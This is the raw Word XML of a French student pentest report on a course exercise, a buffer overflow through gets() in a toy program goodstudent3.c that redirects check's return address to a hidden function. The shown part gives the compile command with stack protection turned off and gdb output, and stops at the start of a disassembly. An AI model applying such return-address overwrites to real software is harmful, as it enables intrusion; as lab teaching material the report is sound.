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79A3" w14:textId="42A38D6B" w:rsidR="0013261C" w:rsidRPr="0006046C" w:rsidRDefault="00142964" w:rsidP="00142964">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006046C">
        <w:t>Pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006046C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006046C">
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006046C">
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17751DD0" w14:textId="0305632C" w:rsidR="00142964" w:rsidRPr="0006046C" w:rsidRDefault="00142964" w:rsidP="00142964"/>
    <w:p w14:paraId="00BA41B7" w14:textId="1CD3EDE0" w:rsidR="00142964" w:rsidRDefault="00D239C1" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D239C1">
        <w:t xml:space="preserve">Titre de la </w:t>
      </w:r>
      <w:r w:rsidR="00916E4B" w:rsidRPr="00D239C1">
        <w:t>vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF5FDA" w14:textId="5DD7D940" w:rsidR="006D07AA" w:rsidRPr="002B0F97" w:rsidRDefault="002D66EB" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B0F97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden </w:t>
      </w:r>
      <w:r w:rsidR="002B0F97" w:rsidRPr="002B0F97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function execution by b</w:t>
      </w:r>
      <w:r w:rsidR="002B0F97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C9C78" w14:textId="008335CD" w:rsidR="00142964" w:rsidRPr="00D239C1" w:rsidRDefault="00D239C1" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D239C1">
        <w:t>Descr</w:t>
      </w:r>
      <w:r>
        <w:t>iption de la vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333A3FA" w14:textId="44A0C9A1" w:rsidR="00142964" w:rsidRDefault="00C84AF3" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous allons exploiter </w:t>
      </w:r>
      <w:r w:rsidR="00ED7B06">
        <w:t xml:space="preserve">un buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED7B06">
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E54CAA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A7BD1">
        <w:t xml:space="preserve">pour modifier </w:t>
      </w:r>
      <w:r w:rsidR="002B0F97">
        <w:t xml:space="preserve">la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B0F97">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B0F97">
        <w:t xml:space="preserve"> d’une fonction et exécuter une fonction cachée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0EF0FE" w14:textId="724522E3" w:rsidR="006D07AA" w:rsidRDefault="00251D0F" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Éléments affectés</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A64E3C" w14:textId="45D53C0D" w:rsidR="006D07AA" w:rsidRPr="006D07AA" w:rsidRDefault="0028765B" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fichier </w:t>
      </w:r>
      <w:r w:rsidR="00453062">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>goodstudent3</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5CCE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de l’exercice </w:t>
      </w:r>
      <w:r w:rsidR="00453062">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la séance </w:t>
      </w:r>
      <w:r w:rsidR="00453062">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005C2DC7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3C9DC" w14:textId="6EC60085" w:rsidR="007D269C" w:rsidRPr="00D239C1" w:rsidRDefault="00802D00" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00281EC2">
        <w:t>réalables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD786DB" w14:textId="0573100C" w:rsidR="00142964" w:rsidRPr="00D239C1" w:rsidRDefault="003C6A9C" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le code source </w:t>
      </w:r>
      <w:r w:rsidR="00E1118D">
        <w:t xml:space="preserve">du programme </w:t>
      </w:r>
      <w:r w:rsidR="00453062">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>goodstudent3</w:t>
      </w:r>
      <w:r w:rsidR="00CB451E" w:rsidRPr="00E54CAA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> est donné</w:t>
      </w:r>
      <w:r w:rsidR="00E1118D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CBF4A" w14:textId="2881AEDC" w:rsidR="00200F18" w:rsidRPr="00281EC2" w:rsidRDefault="00200F18" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00281EC2">
        <w:t>Mise en place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E256B" w14:textId="74D8CE9E" w:rsidR="00427B60" w:rsidRDefault="00427B60" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce proof of concept </w:t>
      </w:r>
      <w:r w:rsidR="00A70609">
        <w:t xml:space="preserve">est </w:t>
      </w:r>
      <w:r w:rsidR="00803693">
        <w:t xml:space="preserve">conçu sur une machine virtuelle Kali Linux </w:t>
      </w:r>
      <w:r w:rsidR="00E54CAA">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00803693">
        <w:t xml:space="preserve"> bits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121DFB67" w14:textId="54CE73D2" w:rsidR="00200F18" w:rsidRDefault="001913F0" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous compilons </w:t>
      </w:r>
      <w:r w:rsidR="004478F0">
        <w:t>le programme avec la commande</w:t>
      </w:r>
      <w:r w:rsidR="0084416B">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A6D8A2" w14:textId="48871F7B" w:rsidR="002974AD" w:rsidRDefault="0084416B" w:rsidP="00E54CA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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -g</w:t>
      </w:r>
      <w:r w:rsidR="00E45A45" w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E45A45" w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E45A45" w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E45A45" w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-stack-protector</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:r w:rsidR="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>goodstudent3</w:t>
      </w:r>
      <w:r w:rsidR="00E54CAA" w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>goodstudent3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA5278" w14:textId="183AA5E5" w:rsidR="00345AC7" w:rsidRPr="00030D44" w:rsidRDefault="00345AC7" w:rsidP="00E54CAA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00030D44">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00030D44">
        <w:t>a protection de</w:t>
      </w:r>
      <w:r w:rsidR="00030D44" w:rsidRPr="00030D44">
        <w:t xml:space="preserve"> stacks </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00030D44" w:rsidRPr="00030D44">
        <w:t>protectors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00030D44" w:rsidRPr="00030D44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00030D44">
        <w:t>est</w:t>
      </w:r>
      <w:r w:rsidR="00030D44" w:rsidRPr="00030D44">
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r w:rsidR="00030D44">
        <w:t>ésactivée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFAE1A" w14:textId="24DCEAE9" w:rsidR="00142964" w:rsidRPr="00D239C1" w:rsidRDefault="00142964" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D239C1">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E174686" w14:textId="7E506AEF" w:rsidR="00EF2B89" w:rsidRDefault="00EA744F" w:rsidP="006B65EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>En analysant le code source du programme, nous pouvons trouver</w:t>
      </w:r>
      <w:r w:rsidR="000218B1">
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r w:rsidR="003C72A7">
        <w:t>’existence</w:t>
      </w:r>
      <w:r w:rsidR="000218B1">
        <w:t xml:space="preserve"> d’une fonction</w:t>
      </w:r>
      <w:r w:rsidR="003C72A7">
        <w:t xml:space="preserve"> cachée </w:t>
      </w:r>
      <w:r w:rsidR="003C72A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="003C72A7">
        <w:t xml:space="preserve"> que nous souhaitons exécuter. </w:t>
      </w:r>
      <w:r w:rsidR="00D63505">
        <w:t>Nous pouvons également trouver</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B056F">
        <w:t xml:space="preserve">l’utilisation d’une fonction vulnérable aux buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B056F">
        <w:t>overflows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B056F">
        <w:t> : la fonction</w:t>
      </w:r>
      <w:r w:rsidR="00BD3D3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E5425D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD3D3D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9FCEC" w14:textId="1DEC2D0F" w:rsidR="00C36895" w:rsidRPr="00F87339" w:rsidRDefault="00821589" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nous devinons donc qu’il est possible d</w:t>
      </w:r>
      <w:r w:rsidR="0047287D">
        <w:t xml:space="preserve">’utiliser un buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0047287D">
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0047287D">
        <w:t xml:space="preserve"> pour modifier la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0047287D">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0047287D">
        <w:t xml:space="preserve"> de la fonction </w:t>
      </w:r>
      <w:r w:rsidR="00F87339">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r w:rsidR="00F87339">
        <w:t xml:space="preserve"> et exécuter la fonction </w:t>
      </w:r>
      <w:r w:rsidR="00F87339">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="00F87339">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03456884" w14:textId="77777777" w:rsidR="00821589" w:rsidRDefault="00821589" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEC4D5B" w14:textId="6FA2503E" w:rsidR="00035929" w:rsidRDefault="00035929" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nous la</w:t>
      </w:r>
      <w:r w:rsidR="00605B29">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">çons le programme </w:t>
      </w:r>
      <w:r w:rsidR="006411EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>goodstudent3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dans gdb, et nous faisons une première exécution avec un argument quelconque afin que gdb puisse initialiser ses adresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEDB56B" w14:textId="77777777" w:rsidR="00035929" w:rsidRDefault="00035929" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BC3EC6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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>┌──(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sebstreb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF67A7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BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali-cli)-[~/cyber/cours2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C114AF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 xml:space="preserve">└─$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> goodstudent3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454366D9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 xml:space="preserve">GNU </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Debian 13.2-1) 13.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD749D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Copyright (C) 2023 Free Software Foundation, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF8672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License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D5B454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This is free software: you are free to change and redistribute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73F087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There is NO WARRANTY, to the extent permitted by law.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF481B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Type "show copying" and "show warranty" for details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DDFE36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This GDB was configured as "x86_64-linux-gnu".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E459E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Type "show configuration" for configuration details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75719CBB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For bug reporting instructions, please see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2296A613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&lt;https://www.gnu.org/software/gdb/bugs/&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DEF36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Find the GDB manual and other documentation resources online at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7EA8F4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 xml:space="preserve">    &lt;http://www.gnu.org/software/gdb/documentation/&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22249DA4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71C05FF0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lastRenderedPageBreak/>
        <w:t>For help, type "help".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D5F56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Type "apropos word" to search for commands related to "word"...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF6EAF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Reading symbols from goodstudent3...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3626F0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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3480864D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Starting program: /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sebstreb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/cyber/cours2/goodstudent3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD0BE4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 xml:space="preserve">[Thread debugging using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE1474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 xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F536BD2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Are you a good student?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C54A5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 xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728136E" w14:textId="77777777" w:rsidR="00BF67A7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>Not yet...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447AFA42" w14:textId="577E6CD4" w:rsidR="001E7206" w:rsidRPr="00BF67A7" w:rsidRDefault="00BF67A7" w:rsidP="00BF67A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BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[Inferior 1 (process 915) exited </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF67A7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>normally</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DB73165" w14:textId="77777777" w:rsidR="00BF67A7" w:rsidRPr="00FD17D0" w:rsidRDefault="00BF67A7" w:rsidP="00BF67A7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20980FE0" w14:textId="77777777" w:rsidR="003617D7" w:rsidRDefault="00FD17D0" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005B3354">
        <w:t>Nous met</w:t>
      </w:r>
      <w:r w:rsidR="005B3354" w:rsidRPr="005B3354">
        <w:t xml:space="preserve">tons ensuite un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B3354" w:rsidRPr="005B3354">
        <w:t>brea</w:t>
      </w:r>
      <w:r w:rsidR="005B3354">
        <w:t>kpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B3354">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E5425D">
        <w:t xml:space="preserve">avant et après l’exécution de la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E5425D">
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E5425D">
        <w:t xml:space="preserve"> pour observer la réécriture du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E5425D">
        <w:t>buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB0D31">
        <w:t xml:space="preserve">, et nous exécutons </w:t>
      </w:r>
      <w:r w:rsidR="00FB0D31" w:rsidRPr="00840174">
        <w:t>de nouveau le programme avec un</w:t>
      </w:r>
      <w:r w:rsidR="00854451">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00FB0D31" w:rsidRPr="00840174">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00854451">
        <w:t>entrée</w:t>
      </w:r>
      <w:r w:rsidR="00FB0D31" w:rsidRPr="00840174">
        <w:t xml:space="preserve"> quelconque pour se retrouver dans</w:t>
      </w:r>
      <w:r w:rsidR="00FB0D31">
        <w:t xml:space="preserve"> l’exécution du programme au niveau de ce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB0D31">
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB0D31">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68482CCD" w14:textId="77777777" w:rsidR="003617D7" w:rsidRDefault="003617D7" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611064A7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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF238A1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Dump of assembler code for function check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037349CA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0x0000555555555195 &lt;+0&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push   %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
